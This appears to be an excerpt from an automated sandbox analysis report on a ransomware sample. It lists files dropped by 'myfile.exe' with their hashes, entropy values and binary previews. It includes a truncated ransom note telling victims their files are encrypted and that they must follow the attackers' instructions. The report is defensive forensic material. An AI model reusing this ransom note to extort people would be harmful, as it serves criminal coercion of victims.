                                                              Preview:.6.=q.F.]9..e..S.s.8...LJ....:.<../...5h".?p.D0....O...7-...(.}s.c.o.6........D...`."...b......Z{.<...l...TI.>.c....\....O.r..."a.=`.Y..{...r.vB..b...z.D.....jP6.a.q.C....M..H..i\.q..iL..F..[....I."........".=P.G.et.h.~..E....../..V4.G.....2.....W.l....e.,...XV.A$h0.......&.R.eoPT.......I.>.r:-...../.3...G."......'Y..7..e..g........A.`.M.g....x....D....+3.a..;::.\..C.Y..7.s8q.o5.1..B<.;......~....n.O.....p..(2=..O.J.....#.........%...t/0D$....r..E...m.l.?#..y.v.^..B8...*.?*$.g.....kP..zk.%.H.H..._.Hs..6@}.....&....9.2%.A.....F...m...<..Ah3...I....Q4K..g.O.t.1..+{*Y...`.F...xmy..f..w.WhH..c.....a).6$.h<.'...L....b.g....Hg.QS|.@..[...j.....*.G.......#.@E........d2...2....?X:..[.A..k.u.?Hz...!...y.;h..:H. .R.~?......m)|d.V...,.`{.3(..D.=om..o.........bg.W..M...\.7f..........G{...Y..z. .Mi.../..d.....?.K.j.U.td....9o.v......I.!.r..|.u{.vNE.........R...%....S..E..!K>....w..W.......m..y....2Nx../...i...a..^...y..f...R+).F...8..?+.+@C
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.8620013922060075
                                                              Encrypted:false
                                                              SSDEEP:24:fq1mf1CnCq6t/tolFNJXpF3TP6BHItxu/3/FIOhnrMMjRdc/:fO21B/+bNPkBoOVMok
                                                              MD5:45DF1194D3DBEB409DCEF73387A748A2
                                                              SHA1:AD259D1CF5A9B72B1E5F798EB215A3839C125653
                                                              SHA-256:99A308205780403723F6A31EFED5E6E91EB21D9F3FA8D0679F85D654670DFDCD
                                                              SHA-512:4AC34B994D9EEEABE5DBF0A70DF84F56D90FDA2B75AA48558F6105C4D00F1BE1744190F616C4D193EFB5296FB28B5C2A6F8C64C67199D3D8586E8B723AC5A7D5
                                                              Malicious:false
                                                              Preview:A....s..L.(Lp.]F.....9..H!........z..."|...w...W.*..p.j.?.q.ew....&[...V]-..MXU..Wxnb\t..j....7.`.a..........*:....X./X..)t.?(....Vul11.Y........J...' ....5...f=.W2..kS..?..,{..s...!$j......^..w58G...p.....y....g\..P..9....iL...;D?.G...i..~.i..-3..@..&..Z,.c.&&cK...:z.<b~d.y8>..&N....W...N...B.q%.....evU.y.;5;....W.......=......uk...TV..S.iY*..C`@..!,.o.....=..O.`.|.../...[..!"^%...;\.......bU..F.D..C .}.o..f.b...a.............7.....W.6...C.x.x..q......f^8a^...^.v>....@......?.T.Ce.P5 ..;.5.=UY^.f.".M.$...o.U#.\c:p..d).c@.py..."..@I...i.'.....pu.).....M.......ad....<......:7......*6a...9....R..u.B,y...j....^yU.+...V..zX.8T.O.....^.Q..l6.G...r3f....c.h....<...}....6......1.......F)x.tmy........[.%.+.K.x..n..mCC.%..}.?.+=O.......l..@.Xd_ {G........S..d...6.l....].V.F'.A.Z.6.V.........[.d8nM.'.<.jy.....b+.....}..#..*2s7'.{.L$z{{(.......>.U..."#~...Q..J.........UXJ..?.L.wK...f..3X...Je........W}.._. .'.3_....x...D..^F.UvD.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.853658505728818
                                                              Encrypted:false
                                                              SSDEEP:24:TL5kdxfn9ujQe5tWTNGsMVV0kE0Ujr6ZOV44eCnrMMj1QOC:5kd5gUOsTq3er6ZOV441Mo1QOC
                                                              MD5:8CDFB04FE55F470AC5A53BD852E49F71
                                                              SHA1:DEF1546FB9D9B80032D1BED440C082FA78369D44
                                                              SHA-256:E2F17855F4718225FE6D58BA41132F4D07CE7D5304B0AEBFE90D11BFDADE9288
                                                              SHA-512:329AE76426DC8BDDE3506A7EB0D8C6A624ECDE2AC02FE1D09D007193370DDE8A5626EEC2FFA454DC2F844CC37E8EC2A4A4E9BB3920649B506618BC847F810E15
                                                              Malicious:false
                                                              Preview:..R...y.9...).7<.....%.K.G.-.|O....+...."K....x%..D..kX.;.@A6...y..^2d`..V.8....t.'..s...1.\....P..%lO.$.e..4C`C.o.h%g..J........kY...&.|..}1.j.?......*.T.i...RV..dq...+:..3.......!.......L.."...,......A*t.<.L.'...}).~sO...t.s..tPL@.g...A7....2e.4...u...`.0..4..c.7.=.QP.....6&y.J.&IE.[.dx.F...\s....~n../..w$....[.#c.\.....+..@.4.....j.!U...<...5...m.}N..c.t....._..E..d.P3....t.Wh>kv.[.....q...M...f.E.kH...$..+.9......V>.6T.....e..$.i3.6.s....tqH...";..kQ.9Io.\4..u.<..........S..;E..0...e>..LH.....sm.{XM 0..]tyQ..}..*...nfF.).g0.......u..4.-_.(I.5.o.r..1.Bh<g.[..i..H...).....Wu..(...$&.p..8..[c.{.... oB.....M.....L. e..C..4./];........!..g#~..#..v++Z...O......f9.....*..U.u.9.rhm..i....E....+.(.gR.WC....)..HE....v;[#.lm.=/......y..W.'.1d.h...S5[i.l..pX.Q.....S.iP\.f.......b.IN.....R..Y... ....x..W..T.s....(S...HMhr..D...X%....L.@..(....Z...j..h..T..F..R.I....{&?(..k."..........X..a..+.KE..YMIq.f..b...#.i."..I)...].Do...X..!p~.Z.>.t(.~
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.822064739878094
                                                              Encrypted:false
                                                              SSDEEP:24:F96RN4yIb2seArvdr9/HxgxgBpcK5KmrFnrMMjYo9:F9sNC2spvd1Hix0cKUmr1Mod9
                                                              MD5:235B82D83E5BEBC4B623F5F5FCE41F92
                                                              SHA1:26A20A536D1D98CC509CD991B30F8E44B65D25B9
                                                              SHA-256:4E60B4E5C16C230970CDCC71FB63DA9426A78FE57AF148142E8640E9C369F4DE
                                                              SHA-512:F63AF3CFED9E2F6EE2A4BA163B10A9DCDF11094505EF14E82BBCE97C726B8A49C983F12AA97F041006B3E398FDA9A079DEE72C9858C75F9EAEF71284B7A97832
                                                              Malicious:false
                                                              Preview:.,..Y...-....42Xml..7I(..W.@.q.%..s...#'.......G.4.Z..EZ.R.mB$6..Oe.I..s...z.f.h..0.ub.Tqw.C...rR..@..'...\n...9=...5...\...r.oZ....x...0.G.0.,...[..7|l......p.......k....`...._.!.. .......].f.....(=.<....p9.G.]m}0.8.z.9.c]....Y...........E&$..E..w.L...EL..E....t(..I...8.o,.l8f.3x...Y.hG.%.).g...~x...=..........B[....m'z.K`....hb"..`....n.G*Nr1..f..7....[.".TM...ld......L.'.~...rn.n*%9.o........]..).K%..V.\....S...B..... ....<.... b.^...^.m!..-y@....,........=..*Vj..d.*...D?w.1.=..-.d2...#.....:+.."e...Caq$.......E..C=d.f....Eo].W...{.k.5%....0e...o.A(.3...x..._{....Q...U.(..g...[.T..G$......y..`T.{X.g ..#...=..w>...U%.Ej.'3/+.o....4~..8m...~X...$?.".9..;K..Z[<...[....^.u[.A.^.*.....T[.4..^Q.*E.Z.(..P..I<...._T....hI9..\..~|+.*..(..<D..O^.\.....?.-t7..RI..7.............d..e...m..?..w. ................d..P.s..Q...._^..`$?E...0.3%..r.. .O..h...N.Y.3..0.,.FV.S!.3Ox`^..nx...J.,..9.n.#Z.%b..cEk.....S=(..D1?.Q..2.%wtf..^..x..B.....p{v..8+..i..
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.829757189091887
                                                              Encrypted:false
                                                              SSDEEP:24:UgJBCEQgSmabtlIvWjxHMo/HBFayTYQP6Q5OfPxKuXP4J06Ik8WUnrMMj3:UMRQgheHJ/7ayT1UX1XP4ukcMo3
                                                              MD5:738C3104BBE30892802C31E37AF7CC8C
                                                              SHA1:9C7390C774C0776668227D4F70F4294B92E6101D
                                                              SHA-256:BFCCFA516F84990AEF005D2D02DB62B9A4E9D3F9F481DE236C9D996AC9048E01
                                                              SHA-512:E420BEB11DC0AE90424E0785CBA08D742615A877F0969790E9F523CCFEDE983A2330B0DC516C2B4745A5C14B091ABCC8725DCF4DBE78DF6522B1482A36A75A7D
                                                              Malicious:false
                                                              Preview:...9....=........H.....o.\vV2].<..e....q..E....ap}'.!X...C...U..t......k.h.2.)....aF#O.....rR.5{.c.4..;./...C#....|jP....f}.....2.y...3..l~GT....qy".j|e..P.............~..\kAi..\....sL..E...T.........C.q......\=L)..~.$m*...^..<5..|v..P.. .~<...o......N^..q~.k*............\..Mq....+...baB....|........H.0..=NO....6k.ck2.^..2..l..v..L.h..0.Ke4.%En..&...#.@.C.Q^...|.m.x.;...=:`..V;4..".T...L...b...@ya..e......o.D..=.tX.`....B=.G.;..>..;....p9EF.<L... n..q...:. %.2c....x)9|P...-....o..b...,.._.H.3.Y..d..4Z8.T...L...- .D..@mfi..[I.&...}D..Y.6.=.~...v\|)...bAB.@x......T..1NJ../..?.LG..U0aZ8. .....'...|..)C.t.k...9..~..?."..>q.......n.w.$ .c.Zr...u...y.T.."!.YD..E.#..rmK.o..L.N.Y..._\.N<.._[.-..v..V..........-....$j.......[. ^..Q.7..N ...q.J..Kb..7r.....h..0*V.5..{;...o....i.'..a......^ID...>x.D.#...%........vp...a..4.C.X3.........l@....1.......%....$.+.Hh....|...M...U.J...KG.k.F.=.4h..M...F.....o....k...eOxB..~.T..Xjh3.`...ckJsq.^.r.(??...
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.833777858765539
                                                              Encrypted:false
                                                              SSDEEP:24:PJ2ySJrXSzh1olJ7XkTielsnX+KR/ZQb7LKSte5JHAfxqFifkAEKnrMMjiC3E:Bw1C11GJI/snOkQz58rgJqFNAjMoiC0
                                                              MD5:A1CC147466243B0F30B354783E8A44EA
                                                              SHA1:BD5F8C1F9183900FA534D90AD0A091FB0930B0B2
                                                              SHA-256:7FD00CE9850CAB0BC0A0CDFACD41F5D3BD1A25F143F460BFDB67528B80987EF2
                                                              SHA-512:8AE3857FC43B46A0C5AB3E1C8180B5D6441F319CFC8A4E462DFF9A538624342DB1B2E08CB9ADC51A012D5B31F81BD89DE68AC0237DCB7A2E73591C256BCF3CAE
                                                              Malicious:false
                                                              Preview:.f7O..g.+..&.a!A...Nq..S.<<......E-....-.....6v........./......'hW.K$.nV/~..Ol.cY-......f.?x......O0...2*.,...~.....vDYO.d...P......?y...5..G0....*.y...w..{H..4..t0..@.B..%.....%[.)P&.J.fS[..(..t.=.A).NG../...+OLp.L.SF...S.Q.?.L`|......F....,_6...T..*..'.@..[Q...?.....Zn...'.F44PY.3.....;.33.oVz....+.. ...P.}>....5......H.AWd....%'..~M,y..LI...^.'.*9.I.N.%c.8QW....[$'w.$.[..h!@..[..9O..'.o{...K..,...6..C$...w..zc..C.{!..G.pJ.....>...2w.=....<".f..a...>^E(8x....Nv...dhr.....b"!4.).b.\u...H..-b.,[..9.J..3..)..yUf...Z7..+..s..5..-....P.t?R*O..?.[0....}.%.....y:...D......V..B..^x....KD...N.b(._.u.)O.a.uPD..Q.Q.kEv......:{.S....J.^.>9B'...]..-.o...R.Y&..<,..#J(.R.B.IE....../.....s...)G.j.B.......4.C.\t..`.\.S.k.*..f.v.pq......9.+..=...s.y3..v~...0./M..y[....|..[..]'.-.......X.{..%.F/.IE8/..6..?3.r....)...L"i!P.GY.EpV7.Pq....&.1b.k.I...1..q.s...E......_...b^.(..t..o.&.`b-...(..T...>....tw....Y.....J..7CDB..4,V.B.....z=<n....@.6j.|..<..
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.839648736079595
                                                              Encrypted:false
                                                              SSDEEP:24:xzDs8A8Lb5wRZdAW6lX/lZaXB58WQGWFQnQDuqnrMMjkbty38:S8A8q279ZMkmQDfMokJyM
                                                              MD5:006705E98E24C8E3C1E41F2EEC5A3C12
                                                              SHA1:E97DFF165C32CEE897FCA0E663A8E71E8EA121C5
                                                              SHA-256:6C6AF0AF812E09D7EC86C93D46FF63844F42965723293C338C75E0ABB3422209
                                                              SHA-512:C5558BD26DD240882821D98522BB3C6395C7ABD035688265AD5C0930F7AE33F240887977951E6441595447D36F2F8D71B0D8FF5AC0F2A8E35C0791B09D207B05
                                                              Malicious:false
                                                              Preview:7..=/b...,[...{-.v..Vx@..U.B..G..L+..5..,Z....z.I\V.V`...m{h9}..zSc..Cm..7..'I...N#..0.\O.s....>......ww..t..@)..,S...$.A..BdT.&GO[.hd>Fk.o....uk..G...E......J..A..=K. if..0.O..;....)..bD.2.P.:...A...4....e$...cj........r.o...Z.RV....%.;..E..[.3.....N....H.&.=\......;.9.}..n.d.M..Vw...D`..g.2......kw.i....d.[.1...V...Fb#..O.......Q.1r...``=IA....N..@..>..q.Sn..&l..._....%>4...g[....n.'.yZ....=.....ODU.69...Y%w.....J..../.z;...........s..5l......B6EU.$C%.C.s...&"HrH..Sj)[...p...F...<..]}...........r..HO?KQ...i..&.yuv.g..y.X...l.;k.PVe=...k..nt."I`..Z>..J.{.)....a.+..#..b..9EkY.|..,.../[...H....Ts..$.n2..P...'......o..$.X..X...(4Vr#2..G.o..u.N....).v.z.0B...__x.C.n..+5m.....p.}.%,`.z......U.al"[...$I1f.e...S....mE...~.....sG..B.A^..Xg.E%....#.f....z..u....)..kw....W.57..'.....B.\tM.S_.5.c ..N4.Zl.4...K.......N.*.wT).[...{.Z...f.,G(...t:...O..Z....zd.../p."....._wH....7....<2B(`GRg.W........M.$..._.x..|..<l.v..Q....K..A...a..n.=....t
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.839214777537325
                                                              Encrypted:false
                                                              SSDEEP:24:0dWuy1NOnAd8TZIRigz9Dd7hyzpd7Hmqh37nojQx3inrMMjR51I5:0dWz1I0ND9ROpPzo23kMoNW
                                                              MD5:939AE61A7178B2ED1BF4270F34F48312
                                                              SHA1:B8493810CE6471E14184CF86EF8F488B76CE6348
                                                              SHA-256:562FF7D010D04A595C7F1A703C8B3C278A64857EBEDE7FC7FCBE74408C83DF50
                                                              SHA-512:10C0FA00758CFD7C5E97E4E692D74A9390F990C79DD43ECCDA804A5B0EE55B42EBD143BDB700229B859D8B700DE105438EB99628140AD73741E0F9CB367A8F8B
                                                              Malicious:false
                                                              Preview:h.X.jh.M[.....<....9....y"_b.z.:.y..%+...>.....kk......S..".QS..i.O...n....a..1.iD.\..._..w..+L..M..+..s....}61Y...8._MZ....9.n.........V.^.nP.......Q....t....i..st...2.....,@..jr.....V...x..pv(.2aaL.....Q............EFr..oyE...o..^..q...7C.GI..Jo..ryP7..(.q....|.n.G........|.,A.....!.2~...~...;Bc(^.Ks.I._].....s.x...6k.Y.8Gc.?J%...'.)`C.wX=9.......4.i.0._...m.Nl......)j...f4...++...q...a.X.O.GZz\..9d.u.a...........gV;K.8.........5FW&...A....p'...|.M..hG....V_S..am.....\_..7p..fd.B.`u..q.?D&..=...?..6:....t..F%...kU.I].2.].V..&'...Sr..F.W.|..".G....(#............_Z......9.7..l.>u......fd*....~w.......<..r............}.r.)..x.{}...;[q.....p.... .$..*......4.}b3."C..Q..}.......u...#.mO.p.V.r.9w...vsp%..M...:..A.l.q.....O.........M...n.,...]h.s.SD...vQ!.q.3^.....>...#.`/@......}f...|.a...+.g....&:.2.N..y..(.B ."0.C..Y.'.ar}65...s~.Z..4.....Y.)).,8.z?w.0.7b.1...V.~.Z....5...L...sjbe.....!.2*^.!.2.,do.....k.B..8.......[.....U..#....Jj.x.p
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.839455329081229
                                                              Encrypted:false
                                                              SSDEEP:24:A2SNbAC8iRWzxIWi147FjAKZVT8PVr/1AOrGcQsSV+gGBN8nrMMjI+9:A3KCZCIWi14JAKHT8N8vP+gG7iMop
                                                              MD5:32BEABD915FC499ECC57C3706C91740D
                                                              SHA1:4511069781BFC4D25B7BF41C56BAE23B76699B21
                                                              SHA-256:BAAAA627B975D131B551B9B7C3EBD98222F3527C4C920A3BC1430BE8374212B8
                                                              SHA-512:6154C2DD463E9D047DCF8D92D3A0FCF47C525A3BEDE8E675AFD4A519A4272FB8A7CE59A073BDF419C2CC0DA353D8AC00C1EFB25CFB7B6EA82DF1CC6891668292
                                                              Malicious:false
                                                              Preview:,..l..bN3u7{.L.r...t..\H.@..1&P..+.............(.mP...=..h.7.....Og-..,..Z ..Z\.}....$MNH.<..dW`H.[.....d1.Z(Te......./...F.i0...4.s...........q.....%...%.-.WU[Cd......ut...J[..U.v.....~K..Cz..|...44..p.DQ.Z.&..+...m..;VTV......... ;B...dw\}H..3.....U..z.5i..p..1..R.8.8.y..f.W.Nk^........i..2.b.U..n.....\LEJpi...C..A^.b..:....r.V>..$.<Y9..M...W3...0...|...h..K...T..1..+.kX)......T..!.....N#......xj../."....[o.].i..AV6$...Au..=l;...,..f.8...'..a..!..n.u.%D.n37t.em."Q46...S0.yE>Ngi...XOd......Cp+...:./..tk.&.)-.c..#*.x.0......sZ|$Nk..G;.~#..Fu.~v@..$^....b......ZXa.p.. ..+..Yl).?...^.,f.B>.N.g-.H=g.wcH.h...M.....`N_.j;>/..g.Z.......|...f...hP6....5o...!*.J.....)>.H:..q...._.......f....L.W.$..=&K.m..&N.SuoKo... ....5,....SG=.B.....u-R.......~L..Z.;..."..l...Eh..p.H........I...i6..d..j}..ln........W.3.18...;.....Yy..X...]...nZ.*O....P.........;~"..}.a'...t...!..2..hs..Gn`..C....gR2.M...5..E.bt_..D.[E.-H[;....X..C:.|.: ...@....L..j.BV.l.om.z.U1...
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.837080141565357
                                                              Encrypted:false
                                                              SSDEEP:24:XWeF4swA+kcFJZIIvnJsu5WG12DJtsVZNjeFAv52fyL3IspD9BwMnrMMj17Z:XssakcFvdvnyQp0JmzN6FAv5bL3Iq9K4
                                                              MD5:DBF27E594B8B9900F1DAC7A2BE939617
                                                              SHA1:65320D7F574B4303D23B2129CE9A1EB24A5BCC4A
                                                              SHA-256:7DA277F2A20F148B105E9D405A0345F33E4BEF237F64911F042DD88BD62D8D93
                                                              SHA-512:DB9E7261CE721C391307A18AFCEDDCC242E89A617FD25B20400F3D4B065066623CEFA5D6E2267CB9C8F59BA917EF59B902C13A0C84AA785F462C1DAA5A221739
                                                              Malicious:false
                                                              Preview:..z.....g.{.h..x,..d......]w_..2<.o.m..... .~8..QQk..#.=...._...)'.i..#M....*..$-R...7..Z..8.=.G..&+.....B.X.\A..Z..^0..F.y.W,a...K.....X.S.GF.^w.[..].,.r..$~"..}B....{...A.....^.Z...6..N'.>g0....K& J..t..6L.,........,.2g|.$.t...$..JK..>^gE.^W.fF..I..A.....8Q..CLA.?........4.....{]kn.5-g....*O1....?x.N.<.....I...l.C!.........-.4F.Q5P.4.N..."0k.hg=.\.....|..y...cuDny.......\....l.!NncV.k|.d..S3$..4...|..Ic......R....*O..|/m6...f.....|'....Z|.... J......o..n..9wC..a..iT.JC....G../... ....N.zZ...../z>..`...=...x.......E.v...b..&R.u)..<..Y.4....r..(..0.)...y.c[.\$..hOR..Y"..L.L.IyI5...$..;...S-.QIg.Tu.....is_....q....>&T..RZ.$..V.w..P>...n..B...4OG..M.dB4.o...d..L.=.d L.#...p.D........J.>$-.wVR.../......dly....]iT.`..wM.:....L.#I..@._c/.yC...]........>.eb.H.!A..H~P.]4a.,...5..B=...`Ri.n.{z.pR....hP?.y..4q...3....kL.o3.[....H.,.SG^.~...1.BN._.QDY.DTWq..T...K.G.OS..wT..+p.......x....}.1..od.6.M...#I..,h.H.N...wbv.......s.z.q......s/.!,
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.852385543687507
                                                              Encrypted:false
                                                              SSDEEP:24:BPIQiXKFHOgPaIVd/aKCd+e/geW8WXWH/4lnrMMjWOzG:B+aVPaIb/ap+e/geW7rVMoWOzG
                                                              MD5:F9B40848E81009189FF50B021A22A01F
                                                              SHA1:5F00C580239F55B7BEC4D615E5E0CC534BF03838
                                                              SHA-256:9440704EB7BE4105131D5BF7FFA2687841D3282EEC7B3E272B341A5BB0AFACDB
                                                              SHA-512:CBED3A6277ACC2A1DC78FE9CB60FAF1B343226ACD5B49BC925E905E90147A2871861B7881118DE0F5691C5E9164F7AA7BCDCCB88C383EA0B38F8131868C262FD
                                                              Malicious:false
                                                              Preview:z..m.&....f..4.;....L.t.1....5..$@q._... <.@1..E.v...'..E{........(3.ha.A.e.Y.$i+.....D.9u...t...>.....R.o.T.C...a.X....M.F.C.9?.....>.=........8WUj..s...X.N.rs...nz ..2#..T.j0.....|..<V.N.. .K./J.R..^...A.....F...$Z.s..i]|..]../..:.5......0.':...w..,....g2.A.,.......%.vkM.....a.........T..k3....5..R....q..).u{.F._.Vq."._56|V......=..0.%..!...08.w..:....p..A..A7../)..(.Gq<..Y5dF.....5.,.h....`.-Qg.ZV..[34.D.u.B.w....u....j.b..6..3..Y.u.YS...Vn$>..y..ODO..V...*..%e2.w(..........V.{.g..Zz.....k...Cw^.16>.w.. ...|*..r..^.o?...*e.W[...A.x...Z.].....&..V..A...2^g...(.N2.....e...l.....y......+Q<.{C....{g.].B..`.@.^.../.o$........(qYF.....A....m..-...k[...G;M@.Zx...\[1... :._.qp4.J.W..VG...r.~&.IA.....v.....d...GO..-b.8;..<K.!...W...J..!Kc.=.H..rDGP..a..".E...L_|.$$..*..I.8M.0..c..'..Z...(.m.y5.....1..Y..L..`...g.....L....}...S.....W...\.yz..k.....:.Fz..A=.jA.3).V,b.2..r.2.[w..u...T..z@.......@R..AG..5kyS{.UO.J...Y=y.s...=..3.4...hYg...#.t
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.833469902086974
                                                              Encrypted:false
                                                              SSDEEP:24:0opnsBdQ+PN3R/Jr+dkqMJar7vg131dgcnrMMjETU:0mKqkR/lWUWvg1/gCMoR
                                                              MD5:6C11FF23029411EF405FC2EA974C5647
                                                              SHA1:C207AE8CC4F34D0096090900E20118CA28794FCE
                                                              SHA-256:3F2474AF126ED1504699ED84B1BE7EDF595A4F87B7BD9D655E5AA2AE8BF5F225
                                                              SHA-512:93B3185DCAA635772570352CD68E5C33F77BEBEF3F95EF540D7882FE9D24E655FE3FC7F4C6AEA696C23B53CA8615960DFB159FE8861C6E3FB4908E02AA333AF8
                                                              Malicious:false
                                                              Preview:.:Tm{.......1J.L...f.+`....=.3...@..........}...L.b...m.....[....+..1d.#..Poi....D...>E....xq+.Jo}h= .{....1<;..]..N.L.H.k..*..4.>..4.....D+v...Z_+...%...Vm...Q... ?N..f.N.....!+...mlw#...~."..]7a.t....E...D...E...Z...$3.TI.? .:p~.1o[.mP.s~...7t<....G.....q.h...f..|......).1...vCk...s..D...N(..t*.-.Ip....k.M6.m.4....~R....&%)....}..v...{4......_5....<....$..{..\"r"\fN,a..^.)5.g...8.I:..$N..i.._...a.7X.G1...+../...(...^..W...(.\....*c."-.G>..{M].8....OJ.l..9O2vB.s..O.;.;y..3{.....B.2!..P.|U..0.xk..,Q.....}..48...a-...p...m....A....H.1..5..v.9...D.,...........v.....n`>7h@E.5..O......XK.z<f3.!..]...ek.~..`...k..z...)..;.~...0.D}.{5.E.B..].Q..g.#...5....%0....?.[e.nD...t..gR...>.S....]..(.x.mP...'.'L..X.....md.`3.k...IitSc..O.Z......A.v%#..!k.6...I.:....Te....J...6.Bi:.....mY-.%.5...-%9....E}^...Fi.z."_E@e.JW..>..`...8.Y....!8.(.v..Wl..nA(T............d..%.-)....e.#_0pgE.Oh...>Y..h...k-..^ _.{:.....-x..B.j.......V8..{.....(...a..q+..s..,...
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.837738149471725
                                                              Encrypted:false
